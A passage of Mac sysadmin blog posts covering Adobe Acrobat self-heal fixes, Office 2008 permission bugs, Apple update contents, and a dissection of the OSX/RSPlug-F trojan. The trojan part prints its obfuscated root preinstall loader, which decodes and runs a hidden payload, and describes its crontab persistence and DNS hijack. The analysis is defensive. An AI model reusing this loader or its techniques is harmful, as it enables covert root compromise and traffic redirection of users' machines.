So you figure out all the files with loggen, Tracker, fseventer, or whatever your tool, then build your own package with Iceberg. Great. Then you find your “standard” users without admin privileges are getting bothered by Adobe’s SelfHeal BS.

Few things going on here that I’ll try and explain, the code formatting should be copy paste-able check it in a text editor, but all line breaks should be preserved.

Make sure you copy in the new Acrobat Internet-Plugin if the user is using that:
if [ -d "/Library/Internet Plug-Ins/AdobePDFViewer.plugin" ]; then
rm -rf "/Library/Internet Plug-Ins/AdobePDFViewer.plugin";
cp -R "/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app/Contents/MacOS/SelfHealFiles/Library/Internet Plug-Ins/AdobePDFViewer.plugin" "/Library/Internet Plug-Ins/";
fi

These next keys really make it complain if it can’t find them, and yes even if you don’t use the plugin it looks for WebBrowserUsePath, so make sure it’s there, and NoViewerSelfHealNeeded gets a new date put after it for every release! Wow neato, a fun easter egg hunt, thanks Adobe!
defaults write /Library/Preferences/com.adobe.acrobat.90.sh "NoViewerSelfHealNeeded Dec 21 2009" -bool TRUE
defaults write /Library/Preferences/com.adobe.acrobat.pdfviewer WebBrowserUsePath -string "file://localhost/Applications/Adobe%20Acrobat%209%20Pro/Adobe%20Acrobat%20Pro.app/"
defaults write /Library/Preferences/com.adobe.acrobat.pdfviewer AdobePDFDriver -string "file://localhost/Applications/Adobe%20Acrobat%209%20Pro/Adobe%20Acrobat%20Pro.app/"

Now is the truly ridiculous part: if those files and keys aren’t found Acrobat ask for an administrator password and then proceed to write them in current users ~/Library/Preferences! What your users don’t know is they can click Cancel a couple times and it will still write them out, but your they’ve already called you to remote in and authenticate them – you lose! Why Adobe?! WHY!?! Asking for an admin password when you’ll just write it to ~/Library/Preferences?

PDF Printer – Here’s the files you need:
/Library/Printers/PPDs/Contents/Resources/en.lproj/ADPDF9.PPD
/Library/Printers/PPD Plugins/AdobePDFPDE900.plugin
/usr/libexec/cups/backend/pdf900
They are all found in:/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app/Contents/MacOS/SelfHealFiles/AdobePDFPrinter/

After you’ve copied them to their places, you can run Adobe install script:
/Applications/Adobe\ Acrobat\ 9\ Pro/Adobe\ Acrobat\ Pro.app/Contents/MacOS/SelfHealFiles/AdobePDFPrinter/cupshup.pl

I also figured this out in lpadmin too:
lpadmin -p AdobePDF9 -E -P /Library/Printers/PPDs/Contents/Resources/en.lproj/ADPDF9.PPD -v pdf900://distiller/ -D "Adobe PDF 9.0"

Even if you’ve copied in the PPD, the PDE plugin, the cups backend, and setup the printer, it’ll still think its damaged because you don’t have the PPD in Korean, Japanese, and two type of Chinese! So, must use PlistBuddy to correct this (because defaults is tricky to use when a dictionary is nested in an array – WHY Adobe?!)

Quiet the printer “repair”:
/usr/libexec/PlistBuddy -c "set :0:IsInstalledKey NO" /Library/Application\ Support/Adobe/Acrobat/SHExpectedMissingFileTypes.plist
For Tiger users the path is: /Library/Receipts/iTunesX.pkg/Contents/Resources/PlistBuddy

It’s almost shut the hell up, but the Adobe Updater might decide to pop-up and urge your user to call you up to run updates, so shut it up you got to jump through some hoops, its an “XML” file Adobe style so defaults won’t work on it, nor will plistbuddy, that and it’s a per user setting, so they must run it once to make the file, then you can change it:
cat ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.dat | sed 's/1\<\/AutoCheck\>/0\<\/AutoCheck\>/' > ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.new; mv ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.new ~/Library/Application\ Support/Adobe/Updater6/AdobeUpdaterPrefs.dat

Yes, Adobe has a document for this but it seems only to remove the ability to check for updates within the app?!

Trivia: You might want to copy in the new AcroEFGPro90SelfHeal.xml file, although running “repair” from Acrobat will copy in the new file and for some odd Adobe reason, the self heal inside the app uses Mac line endings but when magically moved to /Library/Application Support/, it has Unix line endings changing the size by 2282 bytes (and also the place of a key as well?). This was a read herring in my research.
cp -f /Applications/Adobe\ Acrobat\ 9\ Pro/Adobe\ Acrobat\ Pro.app/Contents/MacOS/AcroEFGPro90SelfHeal.xml /Library/Application\ Support/Adobe/Acrobat/AcroEFGPro90SelfHeal.xml

Adobe: CS5 had better not use InstallerVISE, iNosso, bindiff, Java, XML, or whatever convoluted processes you are clinging to, just use the dang pkg format that Apple has provided – sheesh. Is this overwrought complex system supporting “make-work” jobs for programmers?

Perhaps soon they’ll have a full version of Reader available for download in a seemingly standard .pkg file, but don’t be fooled! If you admin Macs like I do you might have noticed it uses the iNosso plugin to uncompress it’s payload and it is totally incompatible with ARD’s Install Package. It just fails.

But fear not, I am a big fan of Iceberg and it’s ability to make the painstaking process of installing Adobe apps so much easier. And I want to share the love. So here take this.

I put a small how-to in the zip file with a sparse set of instructions and caveats. Basically you install Acrobat Reader in the normal way, install Iceberg, open the iceberg project, and build. You’ll then have a pkg that ARD can push out.

If you have questions — Google it!
(OK you can leave a comment, but for gawd’s sake not “How do I use this?” — seriously!)

So, being the curious guy I am I decided to download the very same file Graham did in his demo. While, hdtvxvid.org had since fixed their hijacked page, luckily the status bar had a readable URL that with some squinting I was able to decipher it… So I downloaded the sucker, you can too!

Live Code: OSX/RSPlug-F trojan

And what else can I say but: I’ll be darned if I can get the thing to work! Actually I do get it to work, but due to some coding errors out of the box, it’s a dud.

So let’s start the dissection:

The URL downloads HDTVPlayerv3.5.dmg, inside is contained install.pkg, which if you’re using Safari on a Mac and have the damnable default of “Open ‘Safe’ files after Downloading” it’ll go right to the installer. Which let me note Open “Safe” Files after downloading is the stupidest thing to happen to browsers since Active-X. The air quotes around “Safe” do not help, Apple, it’s a sly wink and a nod that no file type is totally safe but *shrug* whatcha gonna do? I’ll tell you what: don’t make it a dang default!

Firefox is not off the hook either, let me bring up the poisonous Firefox convenience: “predownloading”. Did everyone notice how the virus alert for Graham pops up before he clicks save? How Firefox initiates downloads immediately to cache and upon the user clicking Save it copies it to the destination or if the click Cancel it stays there. I think Firefox’s behaviour is ridiculous, yes it might make me happy when I download some ginormous game demo and come back hours later having forgotten to click Save and am pleasantly surprised that “hey it’s already here!”, but otherwise let me decide what and when something goes on my hard drive.

Anyway… let’s look at an Installer window the average user won’t look at: Show Files

./AdobeFlash
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/version.plist

First couple of suspect thing is a single flat file called AdobeFlash and then Mozillaplug.plugin, which is really just the mysterious VerifiedDownloadPlugin. No mention of Cinema eh?

Take a gander in Info.plist of install.pkg to see where it goes:
IFPkgFlagDefaultLocation /Library/Internet Plug-Ins/

So then, why would it need root privileges for an admin writable folder, eh?

IFPkgFlagAuthorizationAction RootAuthorization, for those following along in the Info.plist
Bonus: CFBundleGetInfoString = who cares
Double Secret Bonus:
Resource/en.lproj/Description.plist IFPkgDescriptionDescription = shutdafuckup

Strangely when you look in both the logs created by Installer.app in /var/log/installer.log:
Leopard it says: "admin auth received to install"
Tiger says: "Administrator authorization granted."
I don’t know why you wouldn’t want the logs to clearly state root privileges were given, but there you have it, it doesn’t.

So what does it do with the root privileges? Hmmm? Let’s look in the preinstall/preupgrade scripts which are identical because apparently the author didn’t realize that a preflight script would kill two birds with one stone.

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -37 $0 | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
yksrepsak 777 nigeb
O(2/H178PI@(C%6;EQ&<#-RX"-Y(2/21$1!!52M
.... <SNIP> ....
*4F;DI`8*(B(`A$8*TD(`5T4^<3+4EC-8
`
dne


OK, so it takes the tail of itself , does some sed magic to flip around the reveresed UUEncoded data, spit it out, replace ‘applemac’ with ‘AdobeFlash’ (remember that’s in the bom payload), replace bsd with 7000, gnu with a boolean value that depends on whether there are any arguments when the script is called. Then after all that sed nonsense, names the file the result of uname -p, attempts to execute the file (as root), delete that file, then exit.

Well, we’ll get to the ‘unencrypted’ payload in a sec let’s run this and see what happens leopard-fail anf tiger-fail — they fail. As a consequence, the AdobeFlash is NOT installed, but it is the same code as the preinstall so, still not off the hook here.Let’s see where we’re at:

The root crontab is altered to inlude: * */5 * * * /Library/Internet Plug-Ins/AdobeFlash
Since the script fails, the package does not install, so the crontab pointing to it is useless…

i386 is left in the root, it doesn’t get a chance to delete itself, considering that all those && statements mean “execute the next step only if the last thing completed correctly”, since it fails it doesn’t get deleted.

i386 contains some more backward UUEncoded data with and some more sed replacements, then pipes it all into perl, here’s the perl code it attempts to run, but unfortunately it fails on line 14 and goes no further. But let’s say we fix the code so it can talk to the server, get a response, and parse the output into a file…

685 is downloaded to /tmp where it runs, does some more sed string swaps, secret decoder ring translations for the DNS servers, outputs this — the nasty part that changes your DNS entries, then deletes the temp file. It makes good use of the very handy concept of “here documents” to script scutil to change the DNS servers, which seem to rotate, you’ll get new servers everytime you run it, suffice to say, the Ukranian subnet of 85.255.112.xxx is totally compromised, as well as 94.247.2.109 the Latvian server from which the files are downloaded. But who knows who’s financing and running it in this global day and age. But the propensity for matryoshka style nested code seems telling

Running some dig commands to get DNS answers from the servers reveals they are given back valid addresses, currently, but I only tested a few sites, it might only have redirection for select dummy bank sites they have set up, who knows…

The lesson here is: Always use Installer to look at the Files, see what your authorization level is, check out the pre/post scripts and generally do what only 1% of the most vigilant of the population would do and you’ll be fine. Hopefully, root authorization will carry more weight in the Installer.app UI and say “Hey are your sure you want to grant root — REALLY!?”, pre/postflight scripts will be easier to look in UI (I am dreaming aren’t I), the logs won’t lie about the auth level (very do-able), and Firefox will respect my wishes and only truly Save when I click Save… (it’s open source, easy to change, but it’ll take a flame war to settle it)

Until then, I hope you enjoyed this malware tour, stay safe and away from porn sites with 3rd party HD codecs.

Update:
I suppose it’d be helpful to add some instructions on how to reverse the scutil modifications, here’s the script (the code might look familiar)

#!/bin/sh
if (( $(id -u) != 0 )); then echo "Please run with sudo" && exit 1; fi
PSID=$( (/usr/sbin/scutil | /usr/bin/grep PrimaryService | /usr/bin/sed -e 's/.*PrimaryService : //')<< EOF
get State:/Network/Global/IPv4
d.show
quit
EOF
)

/usr/sbin/scutil << EOF
remove State:/Network/Service/$PSID/DNS
quit
EOF

echo "Please toggle your network adapter on/off to refresh DNS servers from DHCP"

Basically it nukes the DNS entries that got hosed, then pulls down the DHCP info, uless you have manually entered DNS settings, in which case, you should know what you’re doing.

/System/Library/CoreServices/SystemVersion.plist

/System/Library/CoreServices/backupd.bundle/Contents/Resources/backupd-helper

/System/Library/CoreServices/backupd.bundle/Contents/Resources/fvimagetool

/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros.kext/Contents/MacOS/AirPortAtheros

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AppleAirPortBrcm4311.kext/Contents/MacOS/AppleAirPortBrcm4311

/System/Library/Extensions

/System.kext/PlugIns/BSDKernel.kext/BSDKernel

/System/Library/Extensions

/System.kext/PlugIns/IOKit.kext/IOKit

/System/Library/Extensions

/System.kext/PlugIns/Libkern.kext/Libkern

/System/Library/Extensions

/System.kext/PlugIns/MACFramework.kext/MACFramework

/System/Library/Extensions

/System.kext/PlugIns/Mach.kext/Mach

/System/Library/Extensions

/System.kext/PlugIns

/System6.0.kext/kernel.6.0

/System/Library/Extensions

/System.kext/PlugIns/Unsupported.kext/Unsupported

/System/Library/Filesystems/AppleShare/afpfs.kext/Contents/MacOS/afpfs

/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Support/mds

/System/Library/LaunchDaemons/com.apple.backupd-attach.plist

/System/Library/LaunchDaemons/com.apple.backupd-auto.plist

/System/Library/LaunchDaemons/com.apple.backupd-wake.plist

/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages/usr/share/man/man1/tmdiagnose.1

Here’s hoping that the update in tandem with the Airport/Time Capsule fixes some of the problems people have had with using a hard drive as an Airport disk on the Airport Extremes. For me it wasn’t even about Time Machine, the real pain was transfers were SLOW even over the 100Mb/s Ethernet (dangit I jumped the gun and didn’t get the GigE model) and sometimes the Airport Disk couldn’t be mounted on my computers until the Airport was restarted. Also with the update the ever mysterious Wide Area Bonjour prefs are still around, they are in the Name-Edit… button now.One more thing…/usr/share/man/man1/tmdiagnose.1: Hmmm, is this a Time Machine diagnostics tool?Let’s have a look at the man page or this one:tmdiagnose(1) BSD General Commands Manual tmdiagnose(1)NAME tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsedfor whatis database.

tmdiagnose(1)             BSD General Commands Manual            tmdiagnose(1) 

NAME

     tmdiagnose, Other_name_for_same_program(), Yet another name for the same program. — This line parsed

     for whatis database.

SYNOPSIS

     tmdiagnose, [-abcd] [-a path] [file] [file ...] arg0 arg2 …

DESCRIPTION

     Use the .Nm macro to refer to your program throughout the man page like such: tmdiagnose, Underlining

     is accomplished with the .Ar macro like this: underlined text.

     A list of items with descriptions:

     item a   Description of item a

     item b   Description of item b

     A list of flags and their descriptions:

     -a       Description of -a flag

     -b       Description of -b flag

FILES

     /usr/share/file_name                          FILE_1 description

     /Users/joeuser/Library/really_long_file_name  FILE_2 description

SEE ALSO

     a(1), b(1), c(1), a(2), b(2), a(3), b(3)

Darwin                           April 2, 2008                          Darwin

 

 Only a dummy man page. And no executable to be found. Its origins though are from the BSD package (see /Library/Receipts/boms/com.apple.pkg.BSD.bom) No change has been made to this man page since 10.5 but yet it is included with this update? Odd. My guess is that there is an Apple internal tool in use but not something for the general public. I mean why would the ‘Rest of Us’ need to diagnose Time Machine?!It’ just works right?

Now tell me does… /Microsoft Office 2008/Read Me.html need to be executable for you to look at it? Tick, tick, tick, *ding*! No. It does not let’s do another!
Does this god awful GIF bullet? /Microsoft Office 2008/Office/Media/Clipart/Bullets.localized/Red Swirl No. But it is.
Ok. One more: /Microsoft Office 2008/Office/Media/Sounds/Yeehaw? Yeah, you’re getting it. No.

The only things that needs execute privileges are directories (that’s application bundles too) and executables such as: Microsoft Word.app/Contents/MacOS/Microsoft Word

And can you remove this execute bit in Finder? No. You have 3 choices, Read & Write, Read Only, and No Access, flip through them all and the x will still be there. You’ll need to chmod it from the terminal, but be careful, not all of them… or just give chmod -R ugo-x * a whirl, then slowly go through and chmod go+x the executables one by one and see if it still works, might be faster than the inverse… but I haven’t tested anything yet, that’s for work tommorrow… and the next day… in the mean time…

Try this: ls -lFGR /Applications/Microsoft\ Office\ 2008

You’ll be seeing red.

BTW: Just in case, the media I am using is Part No: X13-64625-03, I hope MS can fix this and re-press this for Volume License customers — my day job! And speaking of just in case, thanks ‘justincase’ of the Clix forums for pointing out the glaringly obvious.

First things first: They’ve moved to Apple’s Package Maker (.pkg) installer files, good news for the enterprise rollouts? Well, unfortunately they’ve created all the packages to install most all of the files with the owner set to 502.

So let’s say, Mr. IT installs this on a user’s machine where the first user is the admin (501) and the standard user is Joes User (502), well, when after all’s installed, it will give Joe User (502) ownership of these folders and their installed contents:

/Library/Automator/ (if it doesn’t exist already)
/Library/Fonts/Microsoft
/Library/Application Support/Microsoft
/Applications/Microsoft Office 2008

Hmmm, that’s not good now is it? Because A) Joe User will find a way to screw it up and B) those are security holes IT does not want to have. Oh, if only they’d taken a peek at p. 1060 of Cocoa Programming, which basically says, if you let root own the file but the person installing isn’t root, it will assign that user’s id to the installed files, that’s how it should be. Instead if UID 502 doesn’t exist on your system when you install it will still assign that UID as the file’s owner anyway. D’oh!

I think I feel a chown’ing script (or an Iceberg repackaging) coming on and an uninstaller script too. “But, there’s an Uninstaller!”, you say? Yes there is and it does a lovely job of moving the Microsoft Office 2008 folder to the Trash, but it kinda misses the Application Support folder, the fonts folder (and moving the disabled fonts back), and all 97 automator actions… tsk tsk. Still, it was free!

Morning Update: It was late, I was tired (and sick), and I totally didn’t think of this one: “Fix Permissions”. If you do get your ownership fixed on all those files, make sure to delete all the Office2008* files from your /Library/Receipts folder, lest you reverse it all with one click of “Fix Permissions” in Disk Utility. And no, you can’t use awk, sed, or some other readily apparent way to modify the bom files… that’s someting for the MOAB crew

This refers to Seagate’s 750GB & 500GB drives

What else can we find? Once we open the archive.pax.gz there’s the actual Hard Drive Update 1.0 Cocoa app, which has a very scary sounding readme.rtf file inside the Contents/Resources/.lproj:

Warning: It is strongly recommended that you back up the data on your hard drives to an external drive or removable media before running this update. Do not reset, shut down, or turn off power to your computer while performing this update. If an error occurs during the update process, your hard drive(s) may become unusable and all data could be lost. If you have not backed up your data, click Quit and do so now.

As Count Floyd would say: “Oooh Scary”

Next up is the MacOS/Hard Drive Update 1.0 binary and a selection of strings:
installEFIUpdater:
%@/%@/hdfw.efi
This computer is not connected to an AC power source.

It uses an EFI application that will update the firmware on the drives (the AC line makes me chuckle, to think of what the battery life of a Mac Pro would be?! Obviously they used a template for this.)

Inside hdfw.efi are strings that refer to Cygwin, interesting what platform they are using to develop this with: a Windows box emulating *nix
C:\cygwin\home\Loki\Platform\Apple\Common\Application\ATAHDFWUtil\ATAHDFWUtil.c
C:\cygwin\home\Loki\Platform\IntelMpg\AppleTools\Build\X64\ATAHDFWUtil.pdb

Inside the Hard Drive Update 1.0.app/Contents/Resources/System/HDFW directory are hives of model names with single string files (FWAlias & FWCurrent) and the actual firmwares (FW01):
ST3500641AS__P 3_BTD/FWAlias
ST3500641AS__P 3_BTE/FWCurrent
ST3500641AS__P_3_BTE/FW01
ST3500641AS__Q 3_BTD/FWAlias
ST3500641AS__Q 3_BTE/FWCurrent
ST3500641AS__Q_3_BTE/FW01
ST3750640AS_P 3_BTF/FWAlias
ST3750640AS_P 3_BTH/FWCurrent
ST3750640AS_P_3_BTH/FW01
ST3750640AS_Q 3_BTF/FWAlias
ST3750640AS_Q 3_BTH/FWCurrent
ST3750640AS_Q_3_BTH/FW01

Here’s an amusing edited list of strings
0000000000000c96 Lube Event
0000000000000d28 Virgin Sector Cleaned
0000000000000e8f Enter DateOfBirth YYWW
0000000000000eaa Enter 64Bit WorldWideName
000000000000534c DRIVE HAS BEEN SET-STUFFED -%1
00000000000058ca Invalid caller to SaveStuffToDisk()! Write not done! %x
0000000000006c1a !! Going Offlimits !!
0000000000006c31 Sleep?

Sounds like a date gone wrong! You really should get the DOB before initiating a lube event on a virgin sector… *ahem* let me try and get back on track with a couple informative strings about the guts of the drive:
0000000000012b4b Orig Code = BTG4H1 TONKA2_GX_4H1.0GC.0B9
0000000000012e87 Built for GALAXY4D,PITKIN,Redback,TI1810 PreAmp,Agere7531 PreAmp,McKinleyDT,4Disk,220 Servos,7200RPM,8Pole,133MHz


Well, enough spelunking I’m headed topside now.

The Login & Keychain Update 1.0 for Mac OS X 10.5 Leopard is recommended for all Leopard installations. It addresses issues you may encounter when:

*Logging in with an account originally created in Mac OS X 10.1 or earlier that has a password of 8 or more characters.
*Connecting to some 802.11b/g wireless networks.
*Changing the password of a FileVault-protected account.

What files does it affect?

/System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AppleAirPortBrcm4311.kext/Contents/MacOS/AppleAirPortBrcm4311
/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/CodeResources
/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/DiskImages
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/CodeResources
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices

Brcm4311 meaning the Broadcom 4311 wireless chip
I’m sure this is a stop-gap until 10.5.1

And what’s in it? Pure binary. No symbol tables, no strings save for the the device number and copyrights….

ATY,Alopias
ATY,RadeonX1900
113-A52027-202
109-A52027-00
01.00.202
AMD Inc. All Rights Reserved. 2005-2007

If we had the original ROM and this we could see what’s different then reverse engineer the binary! Whatcha think?

Me thinks Apple and AMD/ATi should pimp themselves better for all their hard work…. unless it’s a bone headed bug they had to fix